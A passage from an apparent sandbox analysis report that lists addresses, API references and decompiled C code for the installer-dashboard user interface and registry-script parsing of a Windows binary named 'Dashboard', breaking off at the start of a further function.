                                                                                                                    0x0100f885
                                                                                                                    0x0100f887
                                                                                                                    0x0100f935
                                                                                                                    0x0100f93a
                                                                                                                    0x0100f940
                                                                                                                    0x0100f940
                                                                                                                    0x0100f942
                                                                                                                    0x0100f942
                                                                                                                    0x00000000
                                                                                                                    0x0100f942
                                                                                                                    0x0100f88d
                                                                                                                    0x0100f893
                                                                                                                    0x0100f893
                                                                                                                    0x0100f898
                                                                                                                    0x0100f898
                                                                                                                    0x0100f89c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f89e
                                                                                                                    0x0100f8a2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f8ab
                                                                                                                    0x0100f8ae
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f8c2
                                                                                                                    0x0100f8c7
                                                                                                                    0x0100f8c9
                                                                                                                    0x0100f8cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f8cd
                                                                                                                    0x00000000
                                                                                                                    0x0100f8cd
                                                                                                                    0x0100f7e9
                                                                                                                    0x0100f7ee
                                                                                                                    0x0100f7f0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f7ff
                                                                                                                    0x0100f804
                                                                                                                    0x0100f806
                                                                                                                    0x0100f80c
                                                                                                                    0x0100f813
                                                                                                                    0x0100f826
                                                                                                                    0x0100f826
                                                                                                                    0x0100f813
                                                                                                                    0x00000000
                                                                                                                    0x0100f806
                                                                                                                    0x0100f7c4
                                                                                                                    0x0100f7c6
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f7d2
                                                                                                                    0x00000000
                                                                                                                    0x0100f7d2
                                                                                                                    0x0100f76c
                                                                                                                    0x0100f76f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f783
                                                                                                                    0x0100f788
                                                                                                                    0x0100f78a
                                                                                                                    0x0100f78c
                                                                                                                    0x0100f798
                                                                                                                    0x0100f7a4
                                                                                                                    0x0100f7a6
                                                                                                                    0x0100f7a8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f7a8
                                                                                                                    0x0100f78e
                                                                                                                    0x0100f792
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f792
                                                                                                                    0x0100f743
                                                                                                                    0x0100f66f
                                                                                                                    0x0100f671
                                                                                                                    0x0100f6b1
                                                                                                                    0x0100f6bd
                                                                                                                    0x0100f6bf
                                                                                                                    0x0100f6c1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f6c7
                                                                                                                    0x0100f6cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f6e6
                                                                                                                    0x0100f4e9
                                                                                                                    0x0100f4e9
                                                                                                                    0x0100f4eb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f4f1
                                                                                                                    0x0100f68a
                                                                                                                    0x0100f68c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f68e
                                                                                                                    0x0100f6a7
                                                                                                                    0x0100f6a9
                                                                                                                    0x0100f6ab
                                                                                                                    0x0100f919
                                                                                                                    0x0100f91e
                                                                                                                    0x00000000
                                                                                                                    0x0100f91e
                                                                                                                    0x00000000
                                                                                                                    0x0100f6ab
                                                                                                                    0x0100f54e
                                                                                                                    0x0100f553
                                                                                                                    0x0100f555
                                                                                                                    0x0100f557
                                                                                                                    0x0100f559
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f56b
                                                                                                                    0x0100f56d
                                                                                                                    0x0100f56f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f575
                                                                                                                    0x0100f579
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f57f
                                                                                                                    0x0100f582
                                                                                                                    0x0100f5cc
                                                                                                                    0x0100f5cf
                                                                                                                    0x0100f629
                                                                                                                    0x0100f630
                                                                                                                    0x0100f635
                                                                                                                    0x0100f637
                                                                                                                    0x00000000
                                                                                                                    0x0100f637
                                                                                                                    0x0100f5d1
                                                                                                                    0x0100f5d7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f5eb
                                                                                                                    0x0100f5f1
                                                                                                                    0x0100f5f6
                                                                                                                    0x0100f5f8
                                                                                                                    0x0100f905
                                                                                                                    0x0100f906
                                                                                                                    0x0100f90b
                                                                                                                    0x00000000
                                                                                                                    0x0100f90b
                                                                                                                    0x0100f60b
                                                                                                                    0x0100f611
                                                                                                                    0x0100f613
                                                                                                                    0x0100f61e
                                                                                                                    0x0100f624
                                                                                                                    0x00000000
                                                                                                                    0x0100f624
                                                                                                                    0x0100f615
                                                                                                                    0x0100f618
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f618
                                                                                                                    0x0100f590
                                                                                                                    0x0100f5a5
                                                                                                                    0x0100f5ae
                                                                                                                    0x0100f5b0
                                                                                                                    0x0100f5b2
                                                                                                                    0x0100f5b8
                                                                                                                    0x0100f5be
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f5c4
                                                                                                                    0x00000000
                                                                                                                    0x0100f5c4
                                                                                                                    0x0100f517
                                                                                                                    0x0100f523
                                                                                                                    0x0100f525
                                                                                                                    0x0100f527
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f527
                                                                                                                    0x0100f470
                                                                                                                    0x0100f47a
                                                                                                                    0x0100f47f
                                                                                                                    0x0100f481
                                                                                                                    0x0100f8f1
                                                                                                                    0x00000000
                                                                                                                    0x0100f8f1
                                                                                                                    0x0100f48e
                                                                                                                    0x0100f493
                                                                                                                    0x0100f495
                                                                                                                    0x0100f4a4
                                                                                                                    0x0100f4aa
                                                                                                                    0x0100f4af
                                                                                                                    0x0100f4af
                                                                                                                    0x0100f4af
                                                                                                                    0x0100f4af
                                                                                                                    0x0100f4b6
                                                                                                                    0x0100f4b8
                                                                                                                    0x0100f4fc
                                                                                                                    0x00000000
                                                                                                                    0x0100f4fc
                                                                                                                    0x0100f4c6
                                                                                                                    0x0100f4c8
                                                                                                                    0x0100f4ca
                                                                                                                    0x0100f8fd
                                                                                                                    0x00000000
                                                                                                                    0x0100f8fd
                                                                                                                    0x0100f4e2
                                                                                                                    0x0100f4e4
                                                                                                                    0x00000000
                                                                                                                    0x0100f4e4
                                                                                                                    0x0100f448
                                                                                                                    0x0100f44a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0100f44a
                                                                                                                    0x00000000
                                                                                                                    0x0100f8e9
                                                                                                                    0x0100f947
                                                                                                                    0x0100f94d
                                                                                                                    0x00000000
                                                                                                                    0x0100f952

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3_GS.LIBCMT ref: 0100F3ED
                                                                                                                    • lstrcmpiW.KERNEL32(?,Delete,0000042C,0100FE29,0000007B,?,00000000,00000000), ref: 0100F433
                                                                                                                    • lstrcmpiW.KERNEL32(?,ForceRemove), ref: 0100F442
                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0100F8A5
                                                                                                                      • Part of subcall function 0100C53D: RegCloseKey.ADVAPI32(?,?,0100C5A1), ref: 0100C54B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrcmpi$CloseH_prolog3_lstrlen
                                                                                                                    • String ID: Delete$ForceRemove$NoRemove$Val
                                                                                                                    • API String ID: 989197751-1781481701
                                                                                                                    • Opcode ID: 81c3cbd0e92d524083107f002ca19596d3515cdccc9f9eeb133e889b4df012fc
                                                                                                                    • Instruction ID: da408757ef80bc5ba682544ae8d0336465783bffc6747967f88096f89b6b1a6e
                                                                                                                    • Opcode Fuzzy Hash: 81c3cbd0e92d524083107f002ca19596d3515cdccc9f9eeb133e889b4df012fc
                                                                                                                    • Instruction Fuzzy Hash: 2AD161B1E0022B9BFF339A64CD90BED77B8AF54214F4005E8EA85A71C1DB709E84DB55
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 82%
                                                                                                                    			E0101168F(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				struct HWND__* _t50;
                                                                                                                    				struct HWND__* _t51;
                                                                                                                    				intOrPtr _t58;
                                                                                                                    				intOrPtr* _t60;
                                                                                                                    				intOrPtr* _t62;
                                                                                                                    				struct HWND__* _t63;
                                                                                                                    				void* _t64;
                                                                                                                    				intOrPtr* _t72;
                                                                                                                    				struct HWND__* _t73;
                                                                                                                    				struct HWND__* _t75;
                                                                                                                    				struct HWND__* _t78;
                                                                                                                    				struct HWND__* _t83;
                                                                                                                    				intOrPtr* _t85;
                                                                                                                    				struct HWND__* _t87;
                                                                                                                    				void* _t90;
                                                                                                                    				void* _t101;
                                                                                                                    				void* _t116;
                                                                                                                    				void* _t121;
                                                                                                                    				void* _t122;
                                                                                                                    				void* _t123;
                                                                                                                    
                                                                                                                    				_t123 = __eflags;
                                                                                                                    				_t116 = __edx;
                                                                                                                    				_push(0xc);
                                                                                                                    				E0100880F(E010163E4, __ebx, __edi, __esi);
                                                                                                                    				_t121 = __ecx;
                                                                                                                    				_push(__ecx);
                                                                                                                    				E0100D009(__ebx, _t122 - 0x18, __edi, __ecx, _t123);
                                                                                                                    				 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
                                                                                                                    				if( *((intOrPtr*)(__ecx + 0x5c)) != 0) {
                                                                                                                    					_t50 =  *0x101a004; // 0x101a004
                                                                                                                    					__eflags = _t50 - 0x101a004;
                                                                                                                    					if(_t50 != 0x101a004) {
                                                                                                                    						__eflags =  *(_t50 + 0x1c) & 0x00000008;
                                                                                                                    						if(( *(_t50 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    							_t9 = _t50 + 0x14; // 0x65637845
                                                                                                                    							_t10 = _t50 + 0x10; // 0x6c744143
                                                                                                                    							_t50 = E010090EF( *_t10,  *_t9, 0x26, 0x1002308,  *((intOrPtr*)(__ecx + 0x40)));
                                                                                                                    						}
                                                                                                                    					}
                                                                                                                    					_t90 = _t121 + 4;
                                                                                                                    					__imp__?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ();
                                                                                                                    					__eflags = _t50;
                                                                                                                    					 *(_t122 - 0x10) = _t50;
                                                                                                                    					if(_t50 == 0) {
                                                                                                                    						goto L1;
                                                                                                                    					}
                                                                                                                    					__eflags =  *((intOrPtr*)(_t121 + 0x40)) -  *((intOrPtr*)(_t122 + 8));
                                                                                                                    					if( *((intOrPtr*)(_t121 + 0x40)) !=  *((intOrPtr*)(_t122 + 8))) {
                                                                                                                    						_t118 = E0100C254(_t121);
                                                                                                                    						__eflags = _t118;
                                                                                                                    						if(_t118 < 0) {
                                                                                                                    							L49:
                                                                                                                    							_t51 =  *0x101a004; // 0x101a004
                                                                                                                    							L50:
                                                                                                                    							if(_t51 != 0x101a004 && ( *(_t51 + 0x1c) & 0x00000008) != 0) {
                                                                                                                    								_t41 = _t51 + 0x14; // 0x65637845
                                                                                                                    								_t42 = _t51 + 0x10; // 0x6c744143
                                                                                                                    								E010090EF( *_t42,  *_t41, 0x28, 0x1002308, _t118);
                                                                                                                    							}
                                                                                                                    							L53:
                                                                                                                    							 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
                                                                                                                    							E0100EEC0(_t122 - 0x18);
                                                                                                                    							return E010088FB(_t118);
                                                                                                                    						}
                                                                                                                    						_t58 =  *((intOrPtr*)(_t122 + 8));
                                                                                                                    						__eflags = _t58 - 1;
                                                                                                                    						if(__eflags != 0) {
                                                                                                                    							__eflags = _t58 - 2;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								L39:
                                                                                                                    								_push( *0x101a4c8);
                                                                                                                    								_t118 = E0100FB9E(_t90, _t121, _t118, _t121, __eflags);
                                                                                                                    								__eflags = _t118;
                                                                                                                    								if(_t118 < 0) {
                                                                                                                    									goto L49;
                                                                                                                    								}
                                                                                                                    								_t60 =  *((intOrPtr*)(_t121 + 0x5c));
                                                                                                                    								 *((intOrPtr*)( *_t60 + 0x30))(_t60, 1);
                                                                                                                    								_t62 =  *((intOrPtr*)(_t121 + 0x5c));
                                                                                                                    								_t63 =  *((intOrPtr*)( *_t62 + 0x48))(_t62);
                                                                                                                    								__eflags = _t63;
                                                                                                                    								_t101 = _t121;
                                                                                                                    								if(_t63 == 0) {
                                                                                                                    									__eflags =  *((intOrPtr*)(_t122 + 8)) - 2;
                                                                                                                    									if( *((intOrPtr*)(_t122 + 8)) != 2) {
                                                                                                                    										_t64 = E0100CF42(_t63, _t101, L"idQuestion", 0);
                                                                                                                    										_push(1);
                                                                                                                    									} else {
                                                                                                                    										_t64 = E0100CF42(_t63, _t101, L"idQuestion", L"CancelFromFeaturePage");
                                                                                                                    										_push(0);
                                                                                                                    									}
                                                                                                                    									_push(L"idHint");
                                                                                                                    									_push(E0100CE8D(_t64, _t121));
                                                                                                                    									E0100CD1A(_t65);
                                                                                                                    								} else {
                                                                                                                    									E0100CF42(E0100CF42(_t63, _t101, L"idQuestion", L"SingleProductMode"), _t121, L"idHint", L"SingleProductMode");
                                                                                                                    								}
                                                                                                                    								L46:
                                                                                                                    								_t51 =  *0x101a004; // 0x101a004
                                                                                                                    								__eflags = _t51 - 0x101a004;
                                                                                                                    								if(_t51 == 0x101a004) {
                                                                                                                    									goto L53;
                                                                                                                    								}
                                                                                                                    								__eflags =  *(_t51 + 0x1c) & 0x00000008;
                                                                                                                    								if(( *(_t51 + 0x1c) & 0x00000008) == 0) {
                                                                                                                    									goto L50;
                                                                                                                    								}
                                                                                                                    								_t36 = _t51 + 0x14; // 0x65637845
                                                                                                                    								_t37 = _t51 + 0x10; // 0x6c744143
                                                                                                                    								E010090EF( *_t37,  *_t36, 0x27, 0x1002308,  *((intOrPtr*)(_t121 + 0x40)));
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							__eflags = _t58 - 4;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								goto L39;
                                                                                                                    							}
                                                                                                                    							__eflags = _t58 - 6;
                                                                                                                    							if(__eflags == 0) {
                                                                                                                    								goto L39;
                                                                                                                    							}
                                                                                                                    							__eflags = _t58 - 3;
                                                                                                                    							if(_t58 != 3) {
                                                                                                                    								__eflags = _t58 - 7;
                                                                                                                    								if(_t58 == 7) {
                                                                                                                    									L31:
                                                                                                                    									_t92 =  *(_t122 - 0x10);
                                                                                                                    									_t118 = E0100CD1A(_t58,  *(_t122 - 0x10), L"idProgressCont", 0);
                                                                                                                    									__eflags = _t118;
                                                                                                                    									if(_t118 < 0) {
                                                                                                                    										goto L49;
                                                                                                                    									}
                                                                                                                    									_t118 = E0100CD1A(_t70, _t92,  *0x101a4d4, 0);
                                                                                                                    									__eflags = _t118;
                                                                                                                    									if(_t118 < 0) {
                                                                                                                    										goto L49;
                                                                                                                    									}
                                                                                                                    									_t72 =  *((intOrPtr*)(_t121 + 0x5c));
                                                                                                                    									_t73 =  *((intOrPtr*)( *_t72 + 0x48))(_t72);
                                                                                                                    									__eflags = _t73;
                                                                                                                    									if(_t73 != 0) {
                                                                                                                    										L35:
                                                                                                                    										_t118 = E0100CD1A(_t73, _t92, L"idProgressPageButtonsCont", 0);
                                                                                                                    										__eflags = _t118;
                                                                                                                    										if(_t118 < 0) {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    										_t75 = E0100CD1A(_t74, _t92, L"idCompletePageButtonsCont", 1);
                                                                                                                    										_t118 = _t75;
                                                                                                                    										__eflags = _t75;
                                                                                                                    										if(__eflags < 0) {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    										_push(L"idInstallPage");
                                                                                                                    										_t118 = E0100FB9E(_t92, _t121, _t118, _t121, __eflags);
                                                                                                                    										__eflags = _t118;
                                                                                                                    										if(_t118 < 0) {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    										__eflags =  *((intOrPtr*)(_t122 + 8)) - 8;
                                                                                                                    										_t78 = E0100D5AB(_t92, _t121, _t116, _t76 & 0xffffff00 |  *((intOrPtr*)(_t122 + 8)) == 0x00000008);
                                                                                                                    										L29:
                                                                                                                    										_t118 = _t78;
                                                                                                                    										__eflags = _t118;
                                                                                                                    										if(_t118 < 0) {
                                                                                                                    											goto L49;
                                                                                                                    										}
                                                                                                                    										goto L46;
                                                                                                                    									}
                                                                                                                    									_t118 = _t73;
                                                                                                                    									__eflags = _t118;
                                                                                                                    									if(_t118 < 0) {
                                                                                                                    										goto L49;
                                                                                                                    									}
                                                                                                                    									goto L35;
                                                                                                                    								}
                                                                                                                    								__eflags = _t58 - 8;
                                                                                                                    								if(_t58 == 8) {
                                                                                                                    									goto L31;
                                                                                                                    								}
                                                                                                                    								__eflags = _t58 - 5;
                                                                                                                    								if(__eflags != 0) {
                                                                                                                    									goto L46;
                                                                                                                    								}
                                                                                                                    								_push( *0x101a4c4);
                                                                                                                    								_t118 = E0100FB9E(_t90, _t121, _t118, _t121, __eflags);
                                                                                                                    								__eflags = _t118;
                                                                                                                    								if(_t118 < 0) {
                                                                                                                    									goto L49;
                                                                                                                    								}
                                                                                                                    								_t78 = E0100CF42(_t79, _t121, L"idFIUListScrollviwer", L"Visible");
                                                                                                                    								goto L29;
                                                                                                                    							}
                                                                                                                    							_t118 = E0100CF42(_t58, _t121, L"idErrorMsgCont", 0);
                                                                                                                    							__eflags = _t118;
                                                                                                                    							if(_t118 < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_t118 = E0100CD1A(_t80,  *(_t122 - 0x10), L"idProgressCont", 1);
                                                                                                                    							__eflags = _t118;
                                                                                                                    							if(_t118 < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_t118 = E0100CD1A(_t81,  *(_t122 - 0x10), L"idProgressPageButtonsCont", 1);
                                                                                                                    							__eflags = _t118;
                                                                                                                    							if(_t118 < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_t83 = E0100CD1A(_t82,  *(_t122 - 0x10), L"idCompletePageButtonsCont", 0);
                                                                                                                    							_t118 = _t83;
                                                                                                                    							__eflags = _t83;
                                                                                                                    							if(__eflags < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_push(L"idInstallPage");
                                                                                                                    							_t118 = E0100FB9E(_t90, _t121, _t118, _t121, __eflags);
                                                                                                                    							__eflags = _t118;
                                                                                                                    							if(_t118 < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_t85 =  *((intOrPtr*)(_t121 + 0x5c));
                                                                                                                    							 *((intOrPtr*)( *_t85 + 0x30))(_t85, 0);
                                                                                                                    							goto L46;
                                                                                                                    						}
                                                                                                                    						_t87 = E01011649(_t121, _t116, __eflags);
                                                                                                                    						_t118 = _t87;
                                                                                                                    						__eflags = _t118 - 1;
                                                                                                                    						if(_t118 != 1) {
                                                                                                                    							__eflags = _t118;
                                                                                                                    							if(__eflags < 0) {
                                                                                                                    								goto L49;
                                                                                                                    							}
                                                                                                                    							_push( *0x101a4c0);
                                                                                                                    							_t78 = E0100FB9E(_t90, _t121, _t118, _t121, __eflags);
                                                                                                                    							goto L29;
                                                                                                                    						}
                                                                                                                    						_t118 = 0;
                                                                                                                    						__imp__?GetHWND@NativeHWNDHost@DirectUI@@QAEPAUHWND__@@XZ();
                                                                                                                    						PostMessageW(_t87, 0xbd1, 0, 0);
                                                                                                                    						goto L46;
                                                                                                                    					}
                                                                                                                    					_t118 = 1;
                                                                                                                    					goto L49;
                                                                                                                    				}
                                                                                                                    				L1:
                                                                                                                    				_t118 = 0x8000ffff;
                                                                                                                    				goto L49;
                                                                                                                    			}























                                                                                                                    0x0101168f
                                                                                                                    0x0101168f
                                                                                                                    0x0101168f
                                                                                                                    0x01011696
                                                                                                                    0x0101169b
                                                                                                                    0x0101169d
                                                                                                                    0x010116a1
                                                                                                                    0x010116a9
                                                                                                                    0x010116af
                                                                                                                    0x010116bb
                                                                                                                    0x010116c0
                                                                                                                    0x010116c5
                                                                                                                    0x010116c7
                                                                                                                    0x010116cb
                                                                                                                    0x010116d7
                                                                                                                    0x010116da
                                                                                                                    0x010116dd
                                                                                                                    0x010116dd
                                                                                                                    0x010116cb
                                                                                                                    0x010116e2
                                                                                                                    0x010116e7
                                                                                                                    0x010116ed
                                                                                                                    0x010116ef
                                                                                                                    0x010116f2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010116f7
                                                                                                                    0x010116fa
                                                                                                                    0x0101170b
                                                                                                                    0x0101170d
                                                                                                                    0x0101170f
                                                                                                                    0x010119bb
                                                                                                                    0x010119bb
                                                                                                                    0x010119c0
                                                                                                                    0x010119c5
                                                                                                                    0x010119d5
                                                                                                                    0x010119d8
                                                                                                                    0x010119db
                                                                                                                    0x010119db
                                                                                                                    0x010119e0
                                                                                                                    0x010119e0
                                                                                                                    0x010119e7
                                                                                                                    0x010119f3
                                                                                                                    0x010119f3
                                                                                                                    0x01011715
                                                                                                                    0x01011718
                                                                                                                    0x0101171b
                                                                                                                    0x01011762
                                                                                                                    0x01011765
                                                                                                                    0x0101190b
                                                                                                                    0x0101190b
                                                                                                                    0x01011918
                                                                                                                    0x0101191a
                                                                                                                    0x0101191c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011922
                                                                                                                    0x0101192a
                                                                                                                    0x0101192d
                                                                                                                    0x01011933
                                                                                                                    0x01011936
                                                                                                                    0x01011938
                                                                                                                    0x0101193a
                                                                                                                    0x0101195b
                                                                                                                    0x0101195f
                                                                                                                    0x0101197b
                                                                                                                    0x01011980
                                                                                                                    0x01011961
                                                                                                                    0x0101196b
                                                                                                                    0x01011970
                                                                                                                    0x01011970
                                                                                                                    0x01011982
                                                                                                                    0x0101198e
                                                                                                                    0x0101198f
                                                                                                                    0x0101193c
                                                                                                                    0x01011954
                                                                                                                    0x01011954
                                                                                                                    0x01011994
                                                                                                                    0x01011994
                                                                                                                    0x01011999
                                                                                                                    0x0101199e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010119a0
                                                                                                                    0x010119a4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010119b0
                                                                                                                    0x010119b3
                                                                                                                    0x010119b6
                                                                                                                    0x00000000
                                                                                                                    0x010119b6
                                                                                                                    0x0101176b
                                                                                                                    0x0101176e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011774
                                                                                                                    0x01011777
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101177d
                                                                                                                    0x01011780
                                                                                                                    0x0101180f
                                                                                                                    0x01011812
                                                                                                                    0x01011859
                                                                                                                    0x01011859
                                                                                                                    0x01011869
                                                                                                                    0x0101186b
                                                                                                                    0x0101186d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011881
                                                                                                                    0x01011883
                                                                                                                    0x01011885
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0101188b
                                                                                                                    0x01011891
                                                                                                                    0x01011894
                                                                                                                    0x01011896
                                                                                                                    0x010118b3
                                                                                                                    0x010118c0
                                                                                                                    0x010118c2
                                                                                                                    0x010118c4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010118d2
                                                                                                                    0x010118d7
                                                                                                                    0x010118d9
                                                                                                                    0x010118db
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010118e1
                                                                                                                    0x010118ed
                                                                                                                    0x010118ef
                                                                                                                    0x010118f1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010118f7
                                                                                                                    0x01011901
                                                                                                                    0x0101184a
                                                                                                                    0x0101184a
                                                                                                                    0x0101184c
                                                                                                                    0x0101184e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011854
                                                                                                                    0x010118a9
                                                                                                                    0x010118ab
                                                                                                                    0x010118ad
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010118ad
                                                                                                                    0x01011814
                                                                                                                    0x01011817
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011819
                                                                                                                    0x0101181c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011822
                                                                                                                    0x0101182f
                                                                                                                    0x01011831
                                                                                                                    0x01011833
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011845
                                                                                                                    0x00000000
                                                                                                                    0x01011845
                                                                                                                    0x01011794
                                                                                                                    0x01011796
                                                                                                                    0x01011798
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010117ad
                                                                                                                    0x010117af
                                                                                                                    0x010117b1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010117c6
                                                                                                                    0x010117c8
                                                                                                                    0x010117ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010117da
                                                                                                                    0x010117df
                                                                                                                    0x010117e1
                                                                                                                    0x010117e3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010117e9
                                                                                                                    0x010117f5
                                                                                                                    0x010117f7
                                                                                                                    0x010117f9
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x010117ff
                                                                                                                    0x01011807
                                                                                                                    0x00000000
                                                                                                                    0x01011807
                                                                                                                    0x0101171f
                                                                                                                    0x01011724
                                                                                                                    0x01011726
                                                                                                                    0x01011729
                                                                                                                    0x01011748
                                                                                                                    0x0101174a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x01011750
                                                                                                                    0x01011758
                                                                                                                    0x00000000
                                                                                                                    0x01011758
                                                                                                                    0x0101172b
                                                                                                                    0x01011736
                                                                                                                    0x0101173d
                                                                                                                    0x00000000
                                                                                                                    0x0101173d
                                                                                                                    0x010116fe
                                                                                                                    0x00000000
                                                                                                                    0x010116fe
                                                                                                                    0x010116b1
                                                                                                                    0x010116b1
                                                                                                                    0x00000000

                                                                                                                    APIs
                                                                                                                    • __EH_prolog3.LIBCMT ref: 01011696
                                                                                                                      • Part of subcall function 0100D009: __EH_prolog3.LIBCMT ref: 0100D010
                                                                                                                      • Part of subcall function 0100D009: ??2@YAPAXI@Z.MSVCR80 ref: 0100D025
                                                                                                                    • ?GetElement@NativeHWNDHost@DirectUI@@QAEPAVElement@2@XZ.UXCORE(?,0000000C,01011A57,?), ref: 010116E7
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000001.00000002.259436616.0000000001001000.00000020.00000001.01000000.00000004.sdmp, Offset: 01000000, based on PE: true
                                                                                                                    • Associated: 00000001.00000002.259432248.0000000001000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259455281.000000000101A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    • Associated: 00000001.00000002.259460165.000000000101B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_1_2_1000000_Dashboard.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog3$??2@DirectElement@Element@2@Host@Native
                                                                                                                    • String ID: CancelFromFeaturePage$MultipleProductsMode$SingleProductMode$Visible$idCompletePageButtonsCont$idErrorMsgCont$idFIUListScrollviwer$idHint$idInstallPage$idProdListScrollviedwer$idProgressCont$idProgressPageButtonsCont$idQuestion
                                                                                                                    • API String ID: 765067690-502158243
                                                                                                                    • Opcode ID: 2acba51a9d7b698485d869466626ae5ddcb7fc31ac8363fb91b90a790004e465
                                                                                                                    • Instruction ID: 576265e94bab847d7a3159c867ff885aa05da33510b2501067602ba9f764034b
                                                                                                                    • Opcode Fuzzy Hash: 2acba51a9d7b698485d869466626ae5ddcb7fc31ac8363fb91b90a790004e465
                                                                                                                    • Instruction Fuzzy Hash: EA810630300702ABFB2B6A798954FAD6A63AB81A40F15495CFBD29F2C5DE7EC8018714
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    C-Code - Quality: 73%
                                                                                                                    			E01011039(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                    				signed int _t58;
                                                                                                                    				void* _t72;
                                                                                                                    				void* _t83;
                                                                                                                    				void* _t89;
                                                                                                                    				intOrPtr* _t93;
                                                                                                                    				signed int _t128;
                                                                                                                    				signed int _t129;
                                                                                                                    				signed int _t130;
